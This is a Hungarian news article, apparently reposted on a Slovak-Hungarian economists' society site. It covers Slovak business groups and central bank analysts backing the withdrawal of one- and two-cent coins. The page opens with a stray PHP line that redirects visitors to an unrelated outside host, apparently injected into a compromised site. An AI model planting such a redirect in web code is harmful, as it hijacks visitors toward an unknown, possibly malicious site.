header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> A kiskereskedelem és a vállalkozók korlátoznák az aprópénz használatát
szombat, május 25, 2019

Keresés

A kiskereskedelem és a vállalkozók korlátoznák az aprópénz használatát

2891A vállalkozók és a kiskereskedelem jól meglennének az egy- és kétcentes használata nélkül. Arra a paradox helyzetre is rámutattak, hogy a használatukra fordított költségek meghaladják a tényleges értéküket.

A Szlovák Nemzeti Bank (NBS) analitikusai nemrég arra hívták fel a közvélemény figyelmét, hogy az egy- és kétcentes használatának korlátozása jelentősen csökkentené a kibocsátási, disztribúciós és forgalmazási költségeket. Ezen kívül az automaták többsége sem fogadja el őket.

Az analitikusok szerint ez a lépés csak minimálisan befolyásolná a családok költségvetését. Az elemzésükből kiderül, hogy a leginkább sérülékeny fogyasztórétegre - a kisjövedelemmel rendelkezőkre - akik kisebb gyakorisággal vásárolnak, az árak lekerekítése tulajdonképpen semmilyen érdemleges hatást nem gyakorolna.

„A Szlovákiai Modern Kereskedelmi Szövetség (SAMO) támogat minden olyan intézkedést, amely egyszerűsíti az adminisztrációt és egyaránt csökkenti a fogyasztók és a vállalkozó költségeit. Ezért támogatjuk az egy- és kétcentes érmék bevonást"– fejtett ki Martin Krajčovič, a SAMO elnöke.

A vállalkozók is támogatják az apró centesek bevonását. „Ugyanaz a helyzet, mint a fillér esetében is volt. A kezelési költségek magasabbak, mint az érme értéke, nekünk már megvan a tapasztalatunk a kerekítéssel kapcsolatban, s ezt egy helyes lépésnek tartjuk"– szögezte le Peter Serina, a Szlovákiai Vállalkozói Szövetség ügyvezető igazgatója.

A Szlovákia Fiatal Vállalkozók Szövetsége szerint az aprópénz bevonásának több az előnye, mint a hátránya. „Ha figyelembe vesszük a készpénzforgalom folyamatos csökkenését a készpénzmentes forgalom javára. akkor az aprópénzek kivonása a forgalomból egy helyénvaló lépés"– fogalmazott Ján Solík, a szövetség munkatársa

Az NBS analitikusai azt is számszerűsítették, hogy az alacsony értékű pénzérmék aránya Szlovákiában körülbelül 66 százalék, az egy- és kétcentes érmék esetében ez az arány 55 százalék. Ellenérvként az kis értékű pénzérmék bevonásánál, azt szokták felhozni, hogy ez növeli az inflációt, mivel a vásárlások esetében inkább felfelé kerekítenek. A másik ellenvetés pedig azt hangsúlyozza, hogy a cent alapegységnek számít a fizetőeszközök vonatkozásában.

Az EU több tagállama is bevezette az árak a legközelebbi értékhez való kerekítését, köztük Hollandia, Írország és Olaszország. Az ilyen jellegű kerekítések esetében azonban forgalomba maradnak az egy- és kétcentesek, ugyanakkor a kerekítések miatt nem igazán használják azokat. A kerekítés mindig teljes vásárlás összegére vonatkozik, s csak készpénzforgalomban alkalmazzák.

Az NBS analitikusai rámutattak, hogy a javasolt változás elsősorban az élelmiszerek és az alkohol árát befolyásolná, ugyanis jelenleg az egy- és kétcentesekkel történő fizetések kétharmada ezek esetében valósul meg. Ugyanakkor a szolgáltatások és az ipari termékek esetében csak minimális mértékű az aprópénz használata.

Teraz.sk/Gazdaság.sk
Fotó: TASR

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia